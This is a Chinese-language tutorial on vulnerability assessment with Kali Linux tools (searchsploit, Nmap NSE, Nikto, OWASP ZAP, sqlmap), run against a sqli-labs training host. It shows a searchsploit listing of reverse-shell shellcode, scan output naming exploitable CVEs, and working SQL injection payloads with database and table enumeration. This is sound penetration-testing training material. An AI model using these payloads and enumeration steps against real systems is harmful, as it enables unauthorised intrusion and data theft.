安全漏洞评估

安全漏洞评估

获取网络及本地漏洞数据库信息

网络漏洞数据库介绍

  • 收集,分析和共享有关安全漏洞信息的网站如下:
  • https://nvd.nist.gov
  • https://packetstormsecurity.com
  • https://www.exploit-db.com
  • 本地漏洞数据库介绍
  • Kali Linux中默认集成了exploit-db中的漏洞数据库信息,方便用户在本地查找。默认集成在/usr/share/exploitdb目录下,其中exploit(漏洞信息),shellcodes(shell代码),files_exploits.csv(漏洞索引),files_shellcodes.csv(shell 代码索引)。
┌──(root💀kali)-[~]
└─# ls /usr/share/exploitdb 
exploits  files_exploits.csv  files_shellcodes.csv  shellcodes
  • 为了更加方便的使用本地集成exploit漏洞数据库,Kali Linux提供了searchsploit进行快速寻找安全漏洞工具。
┌──(root💀kali)-[~]
└─# searchsploit                                                                                                                                                                                                                       
  Usage: searchsploit [options] term1 [term2] ... [termN]

========== Examples  ==========
  - 搜索漏洞关键字afd的Windows本地利用漏洞
  searchsploit afd windows local
  - 搜索标题中包含oracle windows的漏洞
  searchsploit -t oracle windows
  - 搜索漏洞号为39446的漏洞
  searchsploit -p 39446
  - 排除dos以及PoC值得包含Linux
  searchsploit linux kernel 3.2 --exclude="(PoC)|/dos/"
  searchsploit -s Apache Struts 2.0.0
  searchsploit linux reverse password
  searchsploit -j 55555 | json_pp

  For more examples, see the manual: https://www.exploit-db.com/searchsploit

=========  Options  =========
## Search Terms
                            执行区分大小写的搜索,(默认不敏感)
   -c, --case     [Term]      Perform a case-sensitive search (Default is inSEnsITiVe)
                                对漏洞标题执行精确匹配(默认是和)[Implies "-t"]
   -e, --exact    [Term]      Perform an EXACT & order match on exploit title (Default is an AND match on each term) [Implies "-t"]
                                e.g. "WordPress 4.1" would not be detect "WordPress Core 4.1")
                              执行严格的搜索,因此输入值必须存在,禁用对版本范围的模糊搜索
   -s, --strict               Perform a strict search, so input values must exist, disabling fuzzy search for version range
                                e.g. "1.1" would not be detected in "1.0 < 1.3")
                              只搜索exploit标题(默认是标题和文件路径)
   -t, --title    [Term]      Search JUST the exploit title (Default is title AND the file's path)
                                从结果中移除值。通过使用“|”分隔,可以将多个值链接起来
       --exclude="term"       Remove values from results. By using "|" to separate, you can chain multiple values
                                e.g. --exclude="term1|term2|term3"

## Output
                            以JSON格式显示结果
   -j, --json     [Term]      Show result in JSON format
                                允许利用标题溢出它们的列
   -o, --overflow [Term]      Exploit titles are allowed to overflow their columns
                                显示攻击的完整路径(如果可能,还将路径复制到剪切板)
   -p, --path     [EDB-ID]    Show the full path to an exploit (and also copies the path to the clipboard if possible)
                                在输出中显示更多信息
   -v, --verbose              Display more information in output
                                显示url到Exploit-DB.com,而不是本地路径
   -w, --www      [Term]      Show URLs to Exploit-DB.com rather than the local path
                                显示EDB-ID值,而不是本地路径
       --id                   Display the EDB-ID value rather than local path
                            在搜索结果中禁用颜色高亮
       --colour               Disable colour highlighting in search results

## Non-Searching
                            将漏洞镜像复制到当前工作目录
   -m, --mirror   [EDB-ID]    Mirror (aka copies) an exploit to the current working directory
                                使用PAGER检查(也就是打开)漏洞
   -x, --examine  [EDB-ID]    Examine (aka opens) the exploit usingPAGER

## Non-Searching
                            显示这帮助文档
   -h, --help                 Show this help screen
                                检查并安装任何exploitdb包更新(brew, deb和git)
   -u, --update               Check for and install any exploitdb package updates (brew, deb & git)

## Automation
                            用服务版本检查Nmap的XML输出中的所有结果
       --nmap     [file.xml]  Checks all results in Nmap's XML output with service version
                                e.g.: nmap [host] -sV -oX file.xml

=======
 Notes 
=======
 * You can use any number of search terms
 * By default, search terms are not case-sensitive, ordering is irrelevant, and will search between version ranges
   * Use '-c' if you wish to reduce results by case-sensitive searching
   * And/Or '-e' if you wish to filter results by using an exact match
   * And/Or '-s' if you wish to look for an exact version match
 * Use '-t' to exclude the file's path to filter the search results
   * Remove false positives (especially when searching using numbers - i.e. versions)
 * When using '--nmap', adding '-v' (verbose), it will search for even more combinations
 * When updating or displaying help, search terms will be ignored

  • 实例:搜索Linux下可以反弹具有密码认证的shellcode
┌──(root💀kali)-[~]
└─# searchsploit linux reverse password                                                                                                                                                                                            
Exploits: No Results
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Shellcode Title                                                                                                                                                                                         |  Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Linux/ARM - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (S59!) + Null-Free Shellcode (100 bytes)                                                                                             | arm/46736.txt
Linux/ARM - Reverse (192.168.1.1:4444/TCP) Shell (/bin/sh) + Password (MyPasswd) + Null-Free Shellcode (156 bytes)                                                                                       | arm/43778.asm
Linux/x64 - Reverse (10.1.1.4/TCP) Shell + Continuously Probing Via Socket + Port-Range (391-399) + Password (la crips) + Null-Free Shellcode (172 bytes)                                                | linux_x86-64/40079.c
Linux/x64 - Reverse (10.1.1.4:46357/TCP) Shell + Subtle Probing + Timer + Burst + Password (la crips) + Multi-Terminal Shellcode (84/122/172 bytes)                                                      | linux_x86-64/40139.c
Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (1234567) Shellcode (104 bytes)                                                                                                      | linux_x86-64/43952.nasm
Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (151 bytes)                                                                                             | linux_x86-64/39185.c
Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Polymorphic Shellcode (122 bytes)                                                                                           | linux_x86-64/39383.c
Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (136 bytes)                                                                                                         | linux_x86-64/43558.asm
Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free Shellcode (77-85/90-98 bytes)                                                                                     | linux_x86-64/35587.c
Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell + Password (hack) + Polymorphic Shellcode (135 bytes)                                                                                                     | linux_x86-64/39388.c
Linux/x64 - Reverse (192.168.1.9:4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (138 bytes)                                                                                                   | linux_x86-64/43568.asm
Linux/x64 - Reverse (::1:1337/TCP) Shell (/bin/sh) + IPv6 + Password (pwnd) Shellcode (115 bytes)                                                                                                        | linux_x86-64/45039.c
Linux/x86_64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (pass) Shellcode (120 bytes)                                                                                                      | linux_x86-64/47291.c
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------

Nmap 探测扫描漏洞

NSE介绍与更新

  • 在Nmap中提供NSE(nmap script engine)用来对Nmap功能进行扩展,Nmap也因为NSE功能越来越大。参加连接如下:
    • https://nmap.org/
  • Nmap nse使用nmap -script-updatedb进行更新。
┌──(root💀kali)-[~]
└─# nmap -script-updatedb                                                                                                                                                                                                              
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-24 09:37 EST
NSE: Updating rule database.
NSE: Script Database updated successfully.
Nmap done: 0 IP addresses (0 hosts up) scanned in 1.20 seconds

NSE脚本分类扫描

  • 在Nmap的NSE脚本引擎中,提供了多种不同分类脚本,可以直接利用分类对目标进行探测。
  • 分类如下:
    • auth: 负责处理鉴权证书(绕开鉴权)的脚本
    • broadcast: 在局域网内探查更多服务开启状况,如dhcp/dns/sqlserver等服务
    • brute: 提供暴力破解方式,针对常见的应用如http/snmp等
    • default: 使用-sC或-A选项扫描时候默认的脚本,提供基本脚本扫描能力
    • discovery: 对网络进行更多的信息,如SMB枚举、SNMP查询等
    • dos: 用于进行拒绝服务攻击
    • exploit: 利用已知的漏洞入侵系统
    • external: 利用第三方的数据库或资源,例如进行whois解析
    • fuzzer: 模糊测试的脚本,发送异常的包到目标机,探测出潜在漏洞 intrusive: 入侵性的脚本,此类脚本可能引发对方的IDS/IPS的记录或屏蔽
    • malware: 探测目标机是否感染了病毒、开启了后门等信息
    • safe: 此类与intrusive相反,属于安全性脚本
    • version: 负责增强服务与版本扫描(Version Detection)功能的脚本
    • vuln: 负责检查目标机是否有常见的漏洞(Vulnerability),如是否有MS08_067
  • 使用nmap -script 分类名 目标对某个一类信息进行探测。
  • 使用nmap对安全漏洞进行探测 nmap -script vuln -A -v -T4 目标
┌──(root💀kali)-[~]
└─# nmap -script vuln -A -v -T4 192.168.10.128                                                                                                                                                                                  
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-24 09:50 EST
NSE: Loaded 149 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 09:50
Completed NSE at 09:50, 10.00s elapsed
Initiating NSE at 09:50
Completed NSE at 09:50, 0.00s elapsed
Initiating ARP Ping Scan at 09:50
Scanning 192.168.10.128 [1 port]
Completed ARP Ping Scan at 09:50, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 09:50
Completed Parallel DNS resolution of 1 host. at 09:50, 0.08s elapsed
Initiating SYN Stealth Scan at 09:50
Scanning 192.168.10.128 [1000 ports]
Discovered open port 80/tcp on 192.168.10.128
Discovered open port 8080/tcp on 192.168.10.128
Discovered open port 22/tcp on 192.168.10.128
Completed SYN Stealth Scan at 09:50, 0.07s elapsed (1000 total ports)
Initiating Service scan at 09:50
Scanning 3 services on 192.168.10.128
Completed Service scan at 09:50, 6.03s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 192.168.10.128
NSE: Script scanning 192.168.10.128.
Initiating NSE at 09:50
Completed NSE at 09:55, 313.10s elapsed
Initiating NSE at 09:55
Completed NSE at 09:55, 0.04s elapsed
Nmap scan report for 192.168.10.128
Host is up (0.00045s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| vulners: 
|   cpe:/a:openbsd:openssh:7.4: 
|       EXPLOITPACK:98FE96309F9524B8C84C508837551A19    5.8     https://vulners.com/exploitpack/EXPLOITPACK:98FE96309F9524B8C84C508837551A19    *EXPLOIT*
|       EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97    5.8     https://vulners.com/exploitpack/EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97    *EXPLOIT*
|       EDB-ID:46516    5.8     https://vulners.com/exploitdb/EDB-ID:46516      *EXPLOIT*
|       CVE-2019-6111   5.8     https://vulners.com/cve/CVE-2019-6111
|       SSH_ENUM        5.0     https://vulners.com/canvas/SSH_ENUM     *EXPLOIT*
|       PACKETSTORM:150621      5.0     https://vulners.com/packetstorm/PACKETSTORM:150621      *EXPLOIT*
|       MSF:AUXILIARY/SCANNER/SSH/SSH_ENUMUSERS 5.0     https://vulners.com/metasploit/MSF:AUXILIARY/SCANNER/SSH/SSH_ENUMUSERS  *EXPLOIT*
|       EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0    5.0     https://vulners.com/exploitpack/EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0    *EXPLOIT*
|       EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283    5.0     https://vulners.com/exploitpack/EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283    *EXPLOIT*
|       EDB-ID:45939    5.0     https://vulners.com/exploitdb/EDB-ID:45939      *EXPLOIT*
|       CVE-2018-15919  5.0     https://vulners.com/cve/CVE-2018-15919
|       CVE-2018-15473  5.0     https://vulners.com/cve/CVE-2018-15473
|       CVE-2017-15906  5.0     https://vulners.com/cve/CVE-2017-15906
|       1337DAY-ID-31730        5.0     https://vulners.com/zdt/1337DAY-ID-31730        *EXPLOIT*
|       EDB-ID:45233    4.6     https://vulners.com/exploitdb/EDB-ID:45233      *EXPLOIT*
|       CVE-2020-14145  4.3     https://vulners.com/cve/CVE-2020-14145
|       CVE-2019-6110   4.0     https://vulners.com/cve/CVE-2019-6110
|       CVE-2019-6109   4.0     https://vulners.com/cve/CVE-2019-6109
|       CVE-2018-20685  2.6     https://vulners.com/cve/CVE-2018-20685
|       PACKETSTORM:151227      0.0     https://vulners.com/packetstorm/PACKETSTORM:151227      *EXPLOIT*
|       EDB-ID:46193    0.0     https://vulners.com/exploitdb/EDB-ID:46193      *EXPLOIT*
|       1337DAY-ID-32009        0.0     https://vulners.com/zdt/1337DAY-ID-32009        *EXPLOIT*
|_      1337DAY-ID-30937        0.0     https://vulners.com/zdt/1337DAY-ID-30937        *EXPLOIT*
80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.10.128
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.10.128:80/Less-16/
|     Form id: 
|     Form action: 
|     
|     Path: http://192.168.10.128:80/Less-14/
|     Form id: 
|     Form action: 
|     
|     Path: http://192.168.10.128:80/Less-17/
|     Form id: 
|     Form action: 
|     
|     Path: http://192.168.10.128:80/Less-15/
|     Form id: 
|     Form action: 
|     
|     Path: http://192.168.10.128:80/Less-19/
|     Form id: 
|     Form action: 
|     
|     Path: http://192.168.10.128:80/Less-20/
|     Form id: 
|     Form action:  
|     
|     Path: http://192.168.10.128:80/Less-13/
|     Form id: 
|     Form action: 
|     
|     Path: http://192.168.10.128:80/Less-12/
|     Form id: 
|     Form action: 
|     
|     Path: http://192.168.10.128:80/Less-11/
|     Form id: 
|_    Form action: 
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /.git/HEAD: Git folder
|_  /images/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)'
| http-git: 
|   192.168.10.128:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|     Remotes:
|_      https://github.com/Audi-1/sqli-labs
|_http-server-header: Apache/2.4.7 (Ubuntu)
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| http-sql-injection: 
|   Possible sqli for forms:
|     Form at path: /Less-13/, form's action: . Fields that might be vulnerable:
|       uname
|       passwd
|     Form at path: /Less-11/, form's action: . Fields that might be vulnerable:
|       uname
|_      passwd
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
8080/tcp open  http    Apache httpd 2.4.10 ((Debian))
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.10.128
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.10.128:8080/Pass-11/index.php
|     Form id: 
|_    Form action: ?save_path=../upload/
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-fileupload-exploiter: 
|   
|     Couldn't find a file-type field.
|   
|     Couldn't find a file-type field.
|   
|     Couldn't find a file-type field.
|   
|     Couldn't find a file-type field.
|   
|     Couldn't find a file-type field.
|   
|     Couldn't find a file-type field.
|   
|     Couldn't find a file-type field.
|   
|     Couldn't find a file-type field.
|   
|     Couldn't find a file-type field.
|   
|     Couldn't find a file-type field.
|   
|     Failed to upload and execute a payload.
|   
|     Couldn't find a file-type field.
|   
|     Failed to upload and execute a payload.
|   
|     Couldn't find a file-type field.
|   
|_    Failed to upload and execute a payload.
|_http-server-header: Apache/2.4.10 (Debian)
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:70:85:EA (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 0.429 days (since Tue Feb 23 23:38:45 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IP ID Sequence Generation: All zeros
TRACEROUTE
HOP RTT     ADDRESS
1   0.45 ms 192.168.10.128
NSE: Script Post-scanning.
Initiating NSE at 09:55
Completed NSE at 09:55, 0.00s elapsed
Initiating NSE at 09:55
Completed NSE at 09:55, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 331.47 seconds
Raw packets sent: 1023 (45.806KB) | Rcvd: 1017 (41.394KB)

Nikto探测扫描漏洞

  • 介绍
  • Nikto是针对Web服务器进行全面检测的扫描器,主要用来检测服务器配置错误,HTTP方法,识别Web应用技术等。
┌──(root💀kali)-[~]
└─# nikto                                     
- Nikto v2.1.6
---------------------------------------------------------------------------
+ ERROR: No host or URL specified
-config+            Use this config file
-Display+           Turn on/off display outputs
-dbcheck            check database and other key files for syntax errors
-Format+            save file (-o) format
-Help               Extended help information
-host+              target host/URL
-id+                Host authentication to use, format is id:pass or id:pass:realm
-list-plugins       List all available plugins
-output+            Write output to this file
-nossl              Disables using SSL
-no404              Disables 404 checks
-Plugins+           List of plugins to run (default: ALL)
-port+              Port to use (default 80)
-root+              Prepend root value to all requests, format is /directory
-ssl                Force ssl mode on port
-Tuning+            Scan tuning
-timeout+           Timeout for requests (default 10 seconds)
-update             Update databases and plugins from CIRT.net
-Version            Print plugin and database versions
-vhost+             Virtual host (for Host header)
+ requires a value
Note: This is the short help output. Use -H for full help text.
  • Nikto 基本扫描
  • 使用nikto -h 目标 -p 端口。
-h 参数设置主机IP地址
-p 参数设置探测端口号
┌──(root💀kali)-[~]
└─# nikto -h 192.168.10.128 -p 80
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.10.128
+ Target Hostname:    192.168.10.128
+ Target Port:        80
+ Start Time:         2021-02-24 10:06:54 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server may leak inodes via ETags, header found with file /, inode: 1efd, size: 52709f5685e40, mtime: gzip
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ OSVDB-3092: /readme: This might be interesting...
+ OSVDB-3092: /readme.txt: This might be interesting...
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /.git/index: Git Index file may contain directory listing information.
+ /.git/HEAD: Git HEAD file found. Full repo details may be present.
+ /.git/config: Git config file found. Infos about repo details may be present.
+ 8725 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time:           2021-02-24 10:07:57 (GMT-5) (63 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Owasp-zap 探测扫描漏洞

介绍

  • OWASP ZAP攻击代理服务器是世界上最受欢迎免费安全工具之一。ZAP可以帮助您在开发和测试应用程序过程中,自动发现Web应用程序中的安全漏洞。另外,它也是一款提供给具备丰富经验的渗透测试人员进行人工安全测试的优秀工具。
  • 官网:https://github.com/zaproxy

使用

  • 点击红框中的图标。

  • 输入目标网站后点击攻击按钮。

  • 攻击完成后会出现图下内容。

SQLMap探测扫描漏洞

介绍

  • SQLMap是一款主要针对Web应用程序SQL注入探测并利用的工具。
┌──(root💀kali)-[~/桌面]
└─# sqlmap                               
___
__H__
___ ___[(]_____ ___ ___  {1.5.2#stable}
|_ -| . ["]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
|_|V...       |_|   http://sqlmap.org
Usage: python3 sqlmap [options]
sqlmap: error: missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, --list-tampers, --wizard, --update, --purge or --dependencies). Use -h for basic and -hh for advanced help

使用

  • 探测URL是否可以进行SQL注入。
# 环境使用到的是sqli-labs
┌──(root💀kali)-[~/桌面]
└─# sqlmap -u "192.168.10.131/Less-1?id=1"
___
__H__
___ ___[']_____ ___ ___  {1.5.2#stable}
|_ -| . [']     | .'| . |
|___|_  ["]_|_|_|__,|  _|
|_|V...       |_|   http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 05:19:30 /2021-02-26/
[05:19:32] [INFO] testing connection to the target URL
got a 301 redirect to 'http://192.168.10.131/Less-1/?id=1'. Do you want to follow? [Y/n] 
[05:19:37] [INFO] checking if the target is protected by some kind of WAF/IPS
[05:19:37] [INFO] testing if the target URL content is stable
[05:19:37] [WARNING] GET parameter 'id' does not appear to be dynamic
[05:19:38] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[05:19:38] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[05:19:38] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] 
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] 
[05:19:40] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[05:19:40] [WARNING] reflective value(s) found and filtering out
[05:19:40] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable 
[05:19:40] [INFO] testing 'Generic inline queries'
[05:19:40] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[05:19:40] [INFO] GET parameter 'id' is 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)' injectable 
[05:19:40] [INFO] testing 'MySQL inline queries'
[05:19:41] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[05:19:41] [WARNING] time-based comparison requires larger statistical model, please wait.............. (done)                                                                                                                            
[05:19:41] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[05:19:41] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[05:19:41] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[05:19:41] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[05:19:41] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[05:19:41] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[05:19:51] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[05:19:51] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[05:19:51] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[05:19:51] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[05:19:51] [INFO] target URL appears to have 3 columns in query
[05:19:52] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection point(s) with a total of 52 HTTP(s) requests:
--- 如果出现下方内容说明注入成功了。
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 4835=4835 AND 'SnrE'='SnrE
Type: error-based
Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
Payload: id=1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x717a767071,(SELECT (ELT(3164=3164,1))),0x7170707071,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'WDxU'='WDxU
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 6458 FROM (SELECT(SLEEP(5)))bmnB) AND 'xpdu'='xpdu
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-4651' UNION ALL SELECT NULL,NULL,CONCAT(0x717a767071,0x62496965714c765063665257444e644141445746534d51685a6d5a677970485155735271576f6356,0x7170707071)-- -
---
[05:19:55] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.5
[05:19:55] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.10.131'
[*] ending @ 05:19:55 /2021-02-26/
  • 探测所有数据库。
┌──(root💀kali)-[~/桌面]
└─# sqlmap -u "192.168.10.131/Less-1?id=1" --dbs
___
__H__
___ ___[']_____ ___ ___  {1.5.2#stable}
|_ -| . [']     | .'| . |
|___|_  ["]_|_|_|__,|  _|
|_|V...       |_|   http://sqlmap.org                                                                                                                                                                                            
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 05:23:06 /2021-02-26/
[05:23:06] [INFO] resuming back-end DBMS 'mysql' 
[05:23:06] [INFO] testing connection to the target URL
got a 301 redirect to 'http://192.168.10.131/Less-1/?id=1'. Do you want to follow? [Y/n] 
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 4835=4835 AND 'SnrE'='SnrE
Type: error-based
Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
Payload: id=1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x717a767071,(SELECT (ELT(3164=3164,1))),0x7170707071,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'WDxU'='WDxU
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 6458 FROM (SELECT(SLEEP(5)))bmnB) AND 'xpdu'='xpdu
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-4651' UNION ALL SELECT NULL,NULL,CONCAT(0x717a767071,0x62496965714c765063665257444e644141445746534d51685a6d5a677970485155735271576f6356,0x7170707071)-- -
---
[05:23:08] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.5
[05:23:08] [INFO] fetching database names
[05:23:08] [INFO] retrieved: 'information_schema'
[05:23:08] [INFO] retrieved: 'challenges'
[05:23:08] [INFO] retrieved: 'mysql'
[05:23:08] [INFO] retrieved: 'performance_schema'
[05:23:08] [INFO] retrieved: 'security'
available databases [5]:                                                                                                                                                                                                                  
[*] challenges
[*] information_schema
[*] mysql
[*] performance_schema
[*] security
[05:23:08] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.10.131'
[*] ending @ 05:23:08 /2021-02-26/
  • 探测security数据库中的所有数据表。
┌──(root💀kali)-[~/桌面]
└─# sqlmap -u "192.168.10.131/Less-1?id=1" -D security --tables                                                                                                                                                                        2 ⨯
___
__H__
___ ___[']_____ ___ ___  {1.5.2#stable}
|_ -| . [']     | .'| . |
|___|_  ["]_|_|_|__,|  _|
|_|V...       |_|   http://sqlmap.org                                                                                                                                                                                             
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 05:25:28 /2021-02-26/
[05:25:28] [INFO] resuming back-end DBMS 'mysql' 
[05:25:28] [INFO] testing connection to the target URL
got a 301 redirect to 'http://192.168.10.131/Less-1/?id=1'. Do you want to follow? [Y/n] 
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 4835=4835 AND 'SnrE'='SnrE
Type: error-based
Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
Payload: id=1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x717a767071,(SELECT (ELT(3164=3164,1))),0x7170707071,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'WDxU'='WDxU
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 6458 FROM (SELECT(SLEEP(5)))bmnB) AND 'xpdu'='xpdu
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
